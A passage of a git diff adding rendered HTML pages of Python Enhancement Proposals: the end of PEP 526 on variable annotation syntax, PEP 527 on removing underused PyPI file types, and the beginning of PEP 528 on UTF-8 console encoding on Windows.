  • It's impossible to retrieve the annotations at runtime outside of attempting to find the module's source code and parse it at runtime, which is inelegant, to say the least.
+

The majority of these issues can be alleviated by making the syntax +a core part of the language. Moreover, having a dedicated annotation syntax +for class and instance variables (in addition to method annotations) will +pave the way to static duck-typing as a complement to nominal typing defined +by PEP 484.

+
+

Non-goals

+

While the proposal is accompanied by an extension of the typing.get_type_hints +standard library function for runtime retrieval of annotations, variable +annotations are not designed for runtime type checking. Third party packages +will have to be developed to implement such functionality.

+

It should also be emphasized that Python will remain a dynamically typed +language, and the authors have no desire to ever make type hints mandatory, +even by convention. Type annotations should not be confused with variable +declarations in statically typed languages. The goal of annotation syntax is +to provide an easy way to specify structured type metadata +for third party tools.

+

This PEP does not require type checkers to change their type checking +rules. It merely provides a more readable syntax to replace type +comments.

+
+
+
+

Specification

+

Type annotation can be added to an assignment statement or to a single +expression indicating the desired type of the annotation target to a third +party type checker:

+
my_var: int
+my_var = 5  # Passes type check.
+other_var: int  = 'a'  # Flagged as error by type checker,
+                       # but OK at runtime.
+
+
+

This syntax does not introduce any new semantics beyond PEP 484, so that +the following three statements are equivalent:

+
var = value # type: annotation
+var: annotation; var = value
+var: annotation = value
+
+
+

Below we specify the syntax of type annotations +in different contexts and their runtime effects.

+

We also suggest how type checkers might interpret annotations, but +compliance to these suggestions is not mandatory. (This is in line +with the attitude towards compliance in PEP 484.)

+
+

Global and local variable annotations

+

The types of locals and globals can be annotated as follows:

+
some_number: int           # variable without initial value
+some_list: List[int] = []  # variable with initial value
+
+
+

Being able to omit the initial value allows for easier typing of variables +assigned in conditional branches:

+
sane_world: bool
+if 2+2 == 4:
+    sane_world = True
+else:
+    sane_world = False
+
+
+

Note that, although the syntax does allow tuple packing, it does not allow +one to annotate the types of variables when tuple unpacking is used:

+
# Tuple packing with variable annotation syntax
+t: Tuple[int, ...] = (1, 2, 3)
+# or
+t: Tuple[int, ...] = 1, 2, 3  # This only works in Python 3.8+
+
+# Tuple unpacking with variable annotation syntax
+header: str
+kind: int
+body: Optional[List[str]]
+header, kind, body = message
+
+
+

Omitting the initial value leaves the variable uninitialized:

+
a: int
+print(a)  # raises NameError
+
+
+

However, annotating a local variable will cause the interpreter to always make +it a local:

+
def f():
+    a: int
+    print(a)  # raises UnboundLocalError
+    # Commenting out the a: int makes it a NameError.
+
+
+

as if the code were:

+
def f():
+    if False: a = 0
+    print(a)  # raises UnboundLocalError
+
+
+

Duplicate type annotations will be ignored. However, static type +checkers may issue a warning for annotations of the same variable +by a different type:

+
a: int
+a: str  # Static type checker may or may not warn about this.
+
+
+
+
+

Class and instance variable annotations

+

Type annotations can also be used to annotate class and instance variables +in class bodies and methods. In particular, the value-less notation a: int +allows one to annotate instance variables that should be initialized +in __init__ or __new__. The proposed syntax is as follows:

+
class BasicStarship:
+    captain: str = 'Picard'               # instance variable with default
+    damage: int                           # instance variable without default
+    stats: ClassVar[Dict[str, int]] = {}  # class variable
+
+
+

Here ClassVar is a special class defined by the typing module that +indicates to the static type checker that this variable should not be +set on instances.

+

Note that a ClassVar parameter cannot include any type variables, regardless +of the level of nesting: ClassVar[T] and ClassVar[List[Set[T]]] are +both invalid if T is a type variable.

+

This could be illustrated with a more detailed example. In this class:

+
class Starship:
+    captain = 'Picard'
+    stats = {}
+
+    def __init__(self, damage, captain=None):
+        self.damage = damage
+        if captain:
+            self.captain = captain  # Else keep the default
+
+    def hit(self):
+        Starship.stats['hits'] = Starship.stats.get('hits', 0) + 1
+
+
+

stats is intended to be a class variable (keeping track of many different +per-game statistics), while captain is an instance variable with a default +value set in the class. This difference might not be seen by a type +checker: both get initialized in the class, but captain serves only +as a convenient default value for the instance variable, while stats +is truly a class variable – it is intended to be shared by all instances.

+

Since both variables happen to be initialized at the class level, it is +useful to distinguish them by marking class variables as annotated with +types wrapped in ClassVar[...]. In this way a type checker may flag +accidental assignments to attributes with the same name on instances.

+

For example, annotating the discussed class:

+
class Starship:
+    captain: str = 'Picard'
+    damage: int
+    stats: ClassVar[Dict[str, int]] = {}
+
+    def __init__(self, damage: int, captain: str = None):
+        self.damage = damage
+        if captain:
+            self.captain = captain  # Else keep the default
+
+    def hit(self):
+        Starship.stats['hits'] = Starship.stats.get('hits', 0) + 1
+
+enterprise_d = Starship(3000)
+enterprise_d.stats = {} # Flagged as error by a type checker
+Starship.stats = {} # This is OK
+
+
+

As a matter of convenience (and convention), instance variables can be +annotated in __init__ or other methods, rather than in the class:

+
from typing import Generic, TypeVar
+T = TypeVar('T')
+
+class Box(Generic[T]):
+    def __init__(self, content):
+        self.content: T = content
+
+
+
+
+

Annotating expressions

+

The target of the annotation can be any valid single assignment +target, at least syntactically (it is up to the type checker what to +do with this):

+
class Cls:
+    pass
+
+c = Cls()
+c.x: int = 0  # Annotates c.x with int.
+c.y: int      # Annotates c.y with int.
+
+d = {}
+d['a']: int = 0  # Annotates d['a'] with int.
+d['b']: int      # Annotates d['b'] with int.
+
+
+

Note that even a parenthesized name is considered an expression, +not a simple name:

+
(x): int      # Annotates x with int, (x) treated as expression by compiler.
+(y): int = 0  # Same situation here.
+
+
+
+
+

Where annotations aren’t allowed

+

It is illegal to attempt to annotate variables subject to global +or nonlocal in the same function scope:

+
def f():
+    global x: int  # SyntaxError
+
+def g():
+    x: int  # Also a SyntaxError
+    global x
+
+
+

The reason is that global and nonlocal don’t own variables; +therefore, the type annotations belong in the scope owning the variable.

+

Only single assignment targets and single right hand side values are allowed. +In addition, one cannot annotate variables used in a for or with +statement; they can be annotated ahead of time, in a similar manner to tuple +unpacking:

+
a: int
+for a in my_iter:
+    ...
+
+f: MyFile
+with myfunc() as f:
+    ...
+
+
+
+
+

Variable annotations in stub files

+

As variable annotations are more readable than type comments, they are +preferred in stub files for all versions of Python, including Python 2.7. +Note that stub files are not executed by Python interpreters, and therefore +using variable annotations will not lead to errors. Type checkers should +support variable annotations in stubs for all versions of Python. For example:

+
# file lib.pyi
+
+ADDRESS: unicode = ...
+
+class Error:
+    cause: Union[str, unicode]
+
+
+
+
+

Preferred coding style for variable annotations

+

Annotations for module-level variables, class and instance variables, and local variables should have a single space after the corresponding colon. There should be no space before the colon. If an assignment has a right-hand side, then the equality sign should have exactly one space on both sides. Examples:

+
    +
  • Yes:
    code: int
    +
    +class Point:
    +    coords: Tuple[int, int]
    +    label: str = '<unknown>'
    +
    +
    +
  • +
  • No:
    code:int  # No space after colon
    +code : int  # Space before colon
    +
    +class Test:
    +    result: int=0  # No spaces around equality sign
    +
    +
    +
  • +
+
+
+
+

Changes to Standard Library and Documentation

+
    +
  • A new covariant type ClassVar[T_co] is added to the typing +module. It accepts only a single argument that should be a valid type, +and is used to annotate class variables that should not be set on class +instances. This restriction is ensured by static checkers, +but not at runtime. See the +classvar section for examples and explanations for the usage of +ClassVar, and see the rejected section +for more information on the reasoning behind ClassVar.
  • +
  • Function get_type_hints in the typing module will be extended, so that one can retrieve type annotations at runtime from modules and classes as well as functions. Annotations are returned as a dictionary mapping from variable names or function arguments to their type hints, with forward references evaluated (see the sketch after this list). For classes it returns a mapping (perhaps collections.ChainMap) constructed from annotations in method resolution order.
  • +
  • Recommended guidelines for using annotations will be added to the +documentation, containing a pedagogical recapitulation of specifications +described in this PEP and in PEP 484. In addition, a helper script for +translating type comments into type annotations will be published +separately from the standard library.
  • +
+
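As a sketch of the extended behaviour (the Tree class is illustrative only), forward references written as strings are evaluated by get_type_hints:

from typing import get_type_hints

class Tree:
    left: 'Tree'   # a forward reference, written as a string
    size: int

# The string 'Tree' has been resolved to the class itself:
assert get_type_hints(Tree) == {'left': Tree, 'size': int}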
+
+

Runtime Effects of Type Annotations

+

Annotating a local variable will cause +the interpreter to treat it as a local, even if it was never assigned to. +Annotations for local variables will not be evaluated:

+
def f():
+    x: NonexistentName  # No error.
+
+
+

However, if it is at a module or class level, then the type will be +evaluated:

+
x: NonexistentName  # Error!
+class X:
+    var: NonexistentName  # Error!
+
+
+

In addition, at the module or class level, if the item being annotated is a +simple name, then it and the annotation will be stored in the +__annotations__ attribute of that module or class (mangled if private) +as an ordered mapping from names to evaluated annotations. +Here is an example:

+
from typing import Dict
+class Player:
+    ...
+players: Dict[str, Player]
+__points: int
+
+print(__annotations__)
+# prints: {'players': typing.Dict[str, __main__.Player],
+#          '_Player__points': <class 'int'>}
+
+
+

__annotations__ is writable, so this is permitted:

+
__annotations__['s'] = str
+
+
+

But attempting to update __annotations__ to something other than an +ordered mapping may result in a TypeError:

+
class C:
+    __annotations__ = 42
+    x: int = 5  # raises TypeError
+
+
+

(Note that the assignment to __annotations__, which is the +culprit, is accepted by the Python interpreter without questioning it +– but the subsequent type annotation expects it to be a +MutableMapping and will fail.)

+

The recommended way of getting annotations at runtime is by using +typing.get_type_hints function; as with all dunder attributes, +any undocumented use of __annotations__ is subject to breakage +without warning:

+
from typing import Dict, ClassVar, get_type_hints
+class Starship:
+    hitpoints: int = 50
+    stats: ClassVar[Dict[str, int]] = {}
+    shield: int = 100
+    captain: str
+    def __init__(self, captain: str) -> None:
+        ...
+
+assert get_type_hints(Starship) == {'hitpoints': int,
+                                    'stats': ClassVar[Dict[str, int]],
+                                    'shield': int,
+                                    'captain': str}
+
+assert get_type_hints(Starship.__init__) == {'captain': str,
+                                             'return': None}
+
+
+

Note that if annotations are not found statically, then the __annotations__ dictionary is not created at all. Also, the value of having annotations available locally does not offset the cost of having to create and populate the annotations dictionary on every function call. Therefore, annotations at function level are not evaluated and not stored.

+
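A quick demonstration of this behaviour (assuming CPython 3.6+):

def f():
    x: NonexistentName  # neither evaluated nor stored
    assert '__annotations__' not in locals()

f()  # runs without error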
+

Other uses of annotations

+

While Python with this PEP will not object to:

+
alice: 'well done' = 'A+'
+bob: 'what a shame' = 'F-'
+
+
+

since it will not care about the type annotation beyond “it evaluates +without raising”, a type checker that encounters it will flag it, +unless disabled with # type: ignore or @no_type_check.

+

However, since Python won’t care what the “type” is, +if the above snippet is at the global level or in a class, __annotations__ +will include {'alice': 'well done', 'bob': 'what a shame'}.

+
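For instance, running the snippet above at module level and printing __annotations__ would show:

alice: 'well done' = 'A+'
bob: 'what a shame' = 'F-'
print(__annotations__)
# {'alice': 'well done', 'bob': 'what a shame'}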

These stored annotations might be used for other purposes, +but with this PEP we explicitly recommend type hinting as the +preferred use of annotations.

+
+
+
+

Rejected/Postponed Proposals

+
    +
  • Should we introduce variable annotations at all? +Variable annotations have already been around for almost two years +in the form of type comments, sanctioned by PEP 484. They are +extensively used by third party type checkers (mypy, pytype, +PyCharm, etc.) and by projects using the type checkers. However, the +comment syntax has many downsides listed in Rationale. This PEP is +not about the need for type annotations, it is about what should be +the syntax for such annotations.
  • +
  • Introduce a new keyword: First, the choice of a good keyword is hard: it can’t be var because that is way too common a variable name, and it can’t be local if we want to use it for class variables or globals. Second, no matter what we choose, we’d still need a __future__ import.
  • +
  • Use def as a keyword: +The proposal would be:
    def primes: List[int] = []
    +def captain: str
    +
    +
    +

    The problem with this is that def means “define a function” to +generations of Python programmers (and tools!), and using it also to +define variables does not increase clarity. (Though this is of +course subjective.)

    +
  • +
  • Use function based syntax: +It was proposed to annotate types of variables using +var = cast(annotation[, value]). Although this syntax +alleviates some problems with type comments like absence of the annotation +in AST, it does not solve other problems such as readability +and it introduces possible runtime overhead.
  • +
  • Allow type annotations for tuple unpacking: +This causes ambiguity: it’s not clear what this statement means:
    x, y: T
    +
    +
    +

    Are x and y both of type T, or do we expect T to be +a tuple type of two items that are distributed over x and y, +or perhaps x has type Any and y has type T? (The +latter is what this would mean if this occurred in a function +signature.) Rather than leave the (human) reader guessing, we +forbid this, at least for now.

    +
  • +
  • Parenthesized form (var: type) for annotations: +It was brought up on python-ideas as a remedy for the above-mentioned +ambiguity, but it was rejected since such syntax would be hairy, +the benefits are slight, and the readability would be poor.
  • +
  • Allow annotations in chained assignments: +This has problems of ambiguity and readability similar to tuple +unpacking, for example in:
    x: int = y = 1
    +z = w: int = 1
    +
    +
    +

it is ambiguous: what should the types of y and z be? Also, the second line is difficult to parse.

    +
  • +
  • Allow annotations in with and for statements: This was rejected because in for it would make it hard to spot the actual iterable, and in with it would confuse CPython’s LL(1) parser.
  • +
  • Evaluate local annotations at function definition time: +This has been rejected by Guido because the placement of the annotation +strongly suggests that it’s in the same scope as the surrounding code.
  • +
  • Store variable annotations also in function scope: +The value of having the annotations available locally is just not enough +to significantly offset the cost of creating and populating the dictionary +on each function call.
  • +
  • Initialize variables annotated without assignment: It was proposed on python-ideas to initialize x in x: int to None or to an additional special constant like JavaScript’s undefined. However, adding yet another singleton value to the language would mean that it needed to be checked for everywhere in the code. Therefore, Guido just said plain “No” to this.
  • +
  • Add also InstanceVar to the typing module: +This is redundant because instance variables are way more common than +class variables. The more common usage deserves to be the default.
  • +
  • Allow instance variable annotations only in methods: +The problem is that many __init__ methods do a lot of things besides +initializing instance variables, and it would be harder (for a human) +to find all the instance variable annotations. +And sometimes __init__ is factored into more helper methods +so it’s even harder to chase them down. Putting the instance variable +annotations together in the class makes it easier to find them, +and helps a first-time reader of the code.
  • +
  • Use syntax x: class t = v for class variables: This would require a more complicated parser, and the class keyword would confuse simple-minded syntax highlighters. In any case, we need ClassVar to store class variables in __annotations__, so a simpler syntax was chosen.
  • +
  • Forget about ClassVar altogether: +This was proposed since mypy seems to be getting along fine without a way +to distinguish between class and instance variables. But a type checker +can do useful things with the extra information, for example flag +accidental assignments to a class variable via the instance +(which would create an instance variable shadowing the class variable). +It could also flag instance variables with mutable defaults, +a well-known hazard.
  • +
  • Use ClassAttr instead of ClassVar: The main reason why ClassVar is better is the following: many things are class attributes, e.g. methods, descriptors, etc. But only specific attributes are conceptually class variables (or maybe constants).
  • +
  • Do not evaluate annotations, treat them as strings: +This would be inconsistent with the behavior of function annotations that +are always evaluated. Although this might be reconsidered in future, +it was decided in PEP 484 that this would have to be a separate PEP.
  • +
  • Annotate variable types in class docstring: +Many projects already use various docstring conventions, often without +much consistency and generally without conforming to the PEP 484 annotation +syntax yet. Also this would require a special sophisticated parser. +This, in turn, would defeat the purpose of the PEP – +collaborating with the third party type checking tools.
  • +
  • Implement __annotations__ as a descriptor: +This was proposed to prohibit setting __annotations__ to something +non-dictionary or non-None. Guido has rejected this idea as unnecessary; +instead a TypeError will be raised if an attempt is made to update +__annotations__ when it is anything other than a mapping.
  • +
  • Treating bare annotations the same as global or nonlocal: +The rejected proposal would prefer that the presence of an +annotation without assignment in a function body should not involve +any evaluation. In contrast, the PEP implies that if the target +is more complex than a single name, its “left-hand part” should be +evaluated at the point where it occurs in the function body, just to +enforce that it is defined. For example, in this example:
    def foo(self):
    +    slef.name: str
    +
    +
    +

    the name slef should be evaluated, just so that if it is not +defined (as is likely in this example :-), the error will be caught +at runtime. This is more in line with what happens when there is +an initial value, and thus is expected to lead to fewer surprises. +(Also note that if the target was self.name (this time correctly +spelled :-), an optimizing compiler has no obligation to evaluate +self as long as it can prove that it will definitely be +defined.)

    +
  • +
+
+
+

Backwards Compatibility

+

This PEP is fully backwards compatible.

+
+
+

Implementation

+

An implementation for Python 3.6 can be found +on GitHub.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0526.rst

+

Last modified: 2024-10-09 11:37:51 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0527/index.html b/pep-0527/index.html
new file mode 100644
index 00000000000..4714b873994
--- /dev/null
+++ b/pep-0527/index.html
@@ -0,0 +1,354 @@
PEP 527 – Removing Un(der)used file types/extensions on PyPI | peps.python.org
+
+


+ + +
+
+
+

PEP 527 – Removing Un(der)used file types/extensions on PyPI

+
+
Author:
+
Donald Stufft <donald at stufft.io>
+
BDFL-Delegate:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
23-Aug-2016
+
Post-History:
+
23-Aug-2016
+
Resolution:
+
Distutils-SIG message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP recommends deprecating, and ultimately removing, support for uploading certain unused or underused file types and extensions to PyPI. In particular it recommends disallowing further uploads of any files of the types bdist_dumb, bdist_rpm, bdist_dmg, bdist_msi, and bdist_wininst, leaving PyPI to only accept new uploads of the sdist, bdist_wheel, and bdist_egg file types.

+

In addition, this PEP proposes removing support for new uploads of sdists using +the .tar, .tar.bz2, .tar.xz, .tar.Z, .tgz, .tbz, and +any other extension besides .tar.gz and .zip.

+

Finally, this PEP also proposes limiting the number of allowed sdist uploads +for each individual release of a project on PyPI to one instead of one for each +allowed extension.

+
+
+

Rationale

+
+

File Formats

+

Currently PyPI supports the following file types:

+
    +
  • sdist
  • +
  • bdist_wheel
  • +
  • bdist_egg
  • +
  • bdist_wininst
  • +
  • bdist_msi
  • +
  • bdist_dmg
  • +
  • bdist_rpm
  • +
  • bdist_dumb
  • +
+

However, these different types of files have varying amounts of usefulness or general use in the ecosystem. Continuing to support them adds a maintenance burden on PyPI as well as on tool authors, and incurs a cost in both bandwidth and disk space not only on PyPI itself, but also on any mirrors of PyPI.

+

Python packaging is a multi-level ecosystem where PyPI is primarily suited and +used to distribute virtual environment compatible packages directly from their +respective project owners. These packages are then consumed either directly +by end-users, or by downstream distributors that take these packages and turn +them into their respective system level packages (such as RPM, deb, MSI, etc).

+

While PyPI itself only directly works with these Python specific but platform +agnostic packages, we encourage community-driven and commercial conversions of +these packages to downstream formats for particular target environments, like:

+
    +
  • The conda cross-platform data analysis ecosystem (conda-forge)
  • +
  • The deb based Linux ecosystem (Debian, Ubuntu, etc)
  • +
  • The RPM based Linux ecosystem (Fedora, openSuSE, Mageia, etc)
  • +
  • The homebrew, MacPorts and fink ecosystems for Mac OS X
  • +
  • The Windows Package Management ecosystem (NuGet, Chocolatey, etc)
  • +
  • 3rd party creation of Windows MSIs and installers (e.g. Christoph Gohlke’s +work at http://www.lfd.uci.edu/~gohlke/pythonlibs/ )
  • +
  • other commercial redistribution formats (ActiveState’s PyPM, Enthought +Canopy, etc)
  • +
  • other open source community redistribution formats (Nix, Gentoo, Arch, *BSD, +etc)
  • +
+

It is the belief of this PEP that the entire ecosystem is best supported by keeping PyPI focused on the platform-agnostic formats, where the limited amount of volunteer time can be used best, instead of spreading that time out amongst several platforms. Furthermore, this PEP believes that the people best positioned to provide well integrated packages for a particular platform are people focused on that platform, and not across all possible platforms.

+
+

bdist_dumb

+

As its name implies, bdist_dumb is not a very complex format; however, it is so simple as to be worthless for actual usage.

+

For instance, if you’re using something like pyenv on macOS and you’re building +a library using Python 3.5, then bdist_dumb will produce a .tar.gz file +named something like exampleproject-1.0.macosx-10.11-x86_64.tar.gz. Right +off the bat this file name is somewhat difficult to differentiate from an +sdist since they both use the same file extension (and with the legacy pre +PEP 440 versions, 1.0-macosx-10.11-x86_64 is a valid, although quite silly, +version number). However, once you open up the created .tar.gz, you’d find +that there is no metadata inside that could be used for things like dependency +discovery and in fact, it is quite simply a tarball containing hardcoded paths +to wherever files would have been installed on the computer creating the +bdist_dumb. Going back to our pyenv on macOS example, this means that if I +created it, it would contain files like:

+

Users/dstufft/.pyenv/versions/3.5.2/lib/python3.5/site-packages/example.py

+
+
+

bdist_rpm

+

The bdist_rpm format on PyPI allows people to upload .rpm files for end users to manually download by hand and then manually install by hand. However, the common usage of rpm is with a specially designed repository that allows automatic installation of dependencies, upgrades, etc, which PyPI does not provide. Thus, it is a type of file that is barely being used on PyPI, with only ~460 files of this type having been uploaded to PyPI (out of a total of 662,544).

+

In addition, services like COPR provide +a better supported mechanism for publishing and using RPM files than we’re ever +likely to get on PyPI.

+
+
+

bdist_dmg, bdist_msi, and bdist_wininst

+

The bdist_dmg, bdist_msi, and bdist_wininst formats are similar in that they are OS-specific installers that will only install a library into an environment and are not designed for real user-facing installs of applications (which would require things like bundling a Python interpreter and the like).

+

Out of these three, the usage for bdist_dmg and bdist_msi is very low, +with only ~500 bdist_msi files and ~50 bdist_dmg files having been +uploaded to PyPI. The bdist_wininst format has more use, with ~14,000 files +having ever been uploaded to PyPI.

+

It’s quite easy to look at the low usage of bdist_dmg and bdist_msi and conclude that removing them will be fairly low impact; however, bdist_wininst has several orders of magnitude more usage. This is somewhat misleading though, because although more people upload those files, the actual usage of the uploaded files is fairly low. Taking a look at the previous 30 days, we can see that 90% of all downloads of bdist_wininst files from PyPI were generated by the mirroring infrastructure and 7% of them were generated by setuptools (which can currently be better covered by bdist_egg files).

+

Given the small number of files uploaded for bdist_dmg and bdist_msi, and given that bdist_wininst largely exists either to consume bandwidth and disk space via the mirroring infrastructure or to serve uses that could be trivially replaced with bdist_egg files, this PEP proposes to include these three formats in the list of those to be disallowed.

+
+
+
+

File Extensions

+

Currently sdist supports a wide variety of file extensions like .tar.gz, .tar, .tar.bz2, .tar.xz, .zip, .tar.Z, .tgz, and .tbz. However, of those, the only extensions which get anything more than negligible usage are .tar.gz with 444,338 sdists currently, .zip with 58,774 sdists currently, and .tar.bz2 with 3,265 sdists currently.

+

Having multiple formats accepted requires tooling both within PyPI and outside of PyPI to handle all of the various extensions that might be used (even if nobody is currently using them). This doesn’t only affect PyPI, but ripples out throughout the ecosystem. In addition, the different formats all have different requirements for what optional C libraries Python was linked against and different requirements for what versions of Python they support. Finally, multiple formats also create a weird situation where there may be two sdist files for a particular project/release with subtly different content.

+

It’s easy to advocate that anything outside of .tar.gz, .zip, and .tar.bz2 should be disallowed. Outside of a tiny handful, nobody has actively been uploading these other types of files in the ~15 years of PyPI’s existence, so they’ve obviously not been particularly useful. In addition, while .tar.xz is theoretically a nicer format than the other .tar.* formats due to the better compression ratio achieved by LZMA, it is only available in Python 3.3+ and has an optional dependency on the lzma C library.

+

Looking at the three extensions we do have in current use, it’s also fairly +easy to conclude that .tar.bz2 can be disallowed as well. It has a fairly +small number of files ever uploaded with it and it requires an additional +optional C library to handle the bzip2 compression.

+

Finally we get down to .tar.gz and .zip. Looking at the pure numbers for these two, we can see that .tar.gz is by far the most uploaded format, with 444,338 total uploaded compared to .zip’s 58,774, and on POSIX operating systems .tar.gz is also the default produced by all currently released versions of Python and setuptools. In addition, these two file types both use the same C library (zlib) which is also required for bdist_wheel and bdist_egg. The two wrinkles with deciding between .tar.gz and .zip are that while on POSIX operating systems .tar.gz is the default, on Windows .zip is the default, and the bdist_wheel format also uses zip.

+

Instead of trying to standardize on either .tar.gz or .zip, this PEP +proposes that we allow either .tar.gz or .zip for sdists.

+
+
+

Limiting number of sdists per release

+

An sdist on PyPI should be a single source of truth for a particular release of software. However, currently PyPI allows you to upload one sdist for each of the sdist file extensions it allows. Currently this allows something like 10 different sdists for a project, but even with this PEP it allows two different sources of truth for a single version. Having multiple sdists can often account for strange bugs that only expose themselves depending on which sdist the person used.

+

To resolve this, this PEP proposes to allow one, and only one, sdist per +release of a project.

+
+
+
+

Removal Process

+

This PEP does NOT propose removing any existing files from PyPI, only +disallowing new ones from being uploaded. This restriction will be phased in on +a per-project basis to allow projects to adjust to the new restrictions where +applicable.

+

First, any existing projects will be flagged to allow legacy file types to be uploaded, and any project without that flag (i.e. new projects) will not be able to upload anything but sdist with a .tar.gz or .zip extension, bdist_wheel, and bdist_egg. Then, any existing projects that have never uploaded a file that requires the legacy file type flag will have that flag removed, also making them fall under the new restrictions. Next, an email will be generated to the maintainers of all projects still given the legacy flag, which will inform them of the upcoming new restrictions on uploads and tell them that these restrictions will be applied to future uploads to their projects starting in 1 month. Finally, after 1 month all projects will have the legacy file type flag removed, and support for uploading these types of files will cease to exist on PyPI.

+

This plan should provide minimal disruption since it does not remove any existing files, and the types of files it does prevent from being uploaded are either not particularly useful (or used), or can be replaced by uploading a similar type of file with a slight change to the project’s process.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0527.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0528/index.html b/pep-0528/index.html
new file mode 100644
index 00000000000..6ffab48c65c
--- /dev/null
+++ b/pep-0528/index.html
@@ -0,0 +1,305 @@
PEP 528 – Change Windows console encoding to UTF-8 | peps.python.org
+
+


+ + +
+
+
+

PEP 528 – Change Windows console encoding to UTF-8

+
+
Author:
+
Steve Dower <steve.dower at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
27-Aug-2016
+
Python-Version:
+
3.6
+
Post-History:
+
01-Sep-2016, 04-Sep-2016
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Historically, Python has used the ANSI APIs for interacting with the Windows operating system, often via C Runtime functions. However, these have long been discouraged in favor of the UTF-16 APIs. Within the operating system, all text is represented as UTF-16, and the ANSI APIs perform encoding and decoding using the active code page.

+

This PEP proposes changing the default standard stream implementation on Windows +to use the Unicode APIs. This will allow users to print and input the full range +of Unicode characters at the default Windows console. This also requires a +subtle change to how the tokenizer parses text from readline hooks.

+
+
+

Specific Changes

+
+

Add _io.WindowsConsoleIO

+

Currently an instance of _io.FileIO is used to wrap the file descriptors +representing standard input, output and error. We add a new class (implemented +in C) _io.WindowsConsoleIO that acts as a raw IO object using the Windows +console functions, specifically, ReadConsoleW and WriteConsoleW.

+

This class will be used when the legacy-mode flag is not in effect, when opening +a standard stream by file descriptor and the stream is a console buffer rather +than a redirected file. Otherwise, _io.FileIO will be used as it is today.

+

This is a raw (bytes) IO class that requires text to be passed encoded with +utf-8, which will be decoded to utf-16-le and passed to the Windows APIs. +Similarly, bytes read from the class will be provided by the operating system as +utf-16-le and converted into utf-8 when returned to Python.

+
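For illustration, code writing directly to the raw stream would pass utf-8 encoded bytes (a sketch assuming an interactive Windows console session under this PEP):

import sys

# The raw console object accepts utf-8; it is transcoded to utf-16-le
# internally before being handed to WriteConsoleW.
sys.stdout.buffer.raw.write('héllo\n'.encode('utf-8'))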

The use of an ASCII compatible encoding is required to maintain compatibility +with code that bypasses the TextIOWrapper and directly writes ASCII bytes to +the standard streams (for example, Twisted’s process_stdinreader.py). Code that assumes +a particular encoding for the standard streams other than ASCII will likely +break.

+
+
+

Add _PyOS_WindowsConsoleReadline

+

To allow Unicode entry at the interactive prompt, a new readline hook is +required. The existing PyOS_StdioReadline function will delegate to the new +_PyOS_WindowsConsoleReadline function when reading from a file descriptor +that is a console buffer and the legacy-mode flag is not in effect (the logic +should be identical to above).

+

Since the readline interface is required to return an 8-bit encoded string with +no embedded nulls, the _PyOS_WindowsConsoleReadline function transcodes from +utf-16-le as read from the operating system into utf-8.

+

The function PyRun_InteractiveOneObject which currently obtains the encoding +from sys.stdin will select utf-8 unless the legacy-mode flag is in effect. +This may require readline hooks to change their encodings to utf-8, or to +require legacy-mode for correct behaviour.

+
+
+

Add legacy mode

+

Launching Python with the environment variable PYTHONLEGACYWINDOWSSTDIO set +will enable the legacy-mode flag, which completely restores the previous +behaviour.

+
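For example, one way to launch a script with the legacy behaviour (a hypothetical demo; script.py is a placeholder):

import os
import subprocess
import sys

# Any value for the variable enables the legacy console streams in the child.
env = dict(os.environ, PYTHONLEGACYWINDOWSSTDIO='1')
subprocess.run([sys.executable, 'script.py'], env=env)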
+
+
+

Alternative Approaches

+

The win_unicode_console package is a pure-Python alternative to changing the +default behaviour of the console. It implements essentially the same +modifications as described here using pure Python code.

+
+
+

Code that may break

+

The following code patterns may break or see different behaviour as a result of +this change. All of these code samples require explicitly choosing to use a raw +file object in place of a more convenient wrapper that would prevent any visible +change.

+
+

Assuming stdin/stdout encoding

+

Code that assumes that the encoding required by sys.stdin.buffer or +sys.stdout.buffer is 'mbcs' or a more specific encoding may currently be +working by chance, but could encounter issues under this change. For example:

+
>>> sys.stdout.buffer.write(text.encode('mbcs'))
+>>> r = sys.stdin.buffer.read(16).decode('cp437')
+
+
+

To correct this code, the encoding specified on the TextIOWrapper should be +used, either implicitly or explicitly:

+
>>> # Fix 1: Use wrapper correctly
+>>> sys.stdout.write(text)
+>>> r = sys.stdin.read(16)
+
+>>> # Fix 2: Use encoding explicitly
+>>> sys.stdout.buffer.write(text.encode(sys.stdout.encoding))
+>>> r = sys.stdin.buffer.read(16).decode(sys.stdin.encoding)
+
+
+
+
+

Incorrectly using the raw object

+

Code that uses the raw IO object and does not correctly handle partial reads and +writes may be affected. This is particularly important for reads, where the +number of characters read will never exceed one-fourth of the number of bytes +allowed, as there is no feasible way to prevent input from encoding as much +longer utf-8 strings:

+
>>> raw_stdin = sys.stdin.buffer.raw
+>>> data = raw_stdin.read(15)
+abcdefghijklm
+b'abc'
+# data contains at most 3 characters, and never more than 12 bytes
+# error, as "defghijklm\r\n" is passed to the interactive prompt
+
+
+

To correct this code, the buffered reader/writer should be used, or the caller +should continue reading until its buffer is full:

+
>>> # Fix 1: Use the buffered reader/writer
+>>> stdin = sys.stdin.buffer
+>>> data = stdin.read(15)
+abcedfghijklm
+b'abcdefghijklm\r\n'
+
+>>> # Fix 2: Loop until enough bytes have been read
+>>> raw_stdin = sys.stdin.buffer.raw
+>>> b = b''
+>>> while len(b) < 15:
+...     b += raw_stdin.read(15)
+abcedfghijklm
+b'abcdefghijklm\r\n'
+
+
+
+
+

Using the raw object with small buffers

+

Code that uses the raw IO object and attempts to read less than four characters +will now receive an error. Because it’s possible that any single character may +require up to four bytes when represented in utf-8, requests must fail:

+
>>> raw_stdin = sys.stdin.buffer.raw
+>>> data = raw_stdin.read(3)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+ValueError: must read at least 4 bytes
+
+
+

The only workaround is to pass a larger buffer:

+
>>> # Fix: Request at least four bytes
+>>> raw_stdin = sys.stdin.buffer.raw
+>>> data = raw_stdin.read(4)
+a
+b'a'
+>>> >>>
+
+
+

(The extra >>> is due to the newline remaining in the input buffer and is +expected in this situation.)

+
+
+ +
+
+

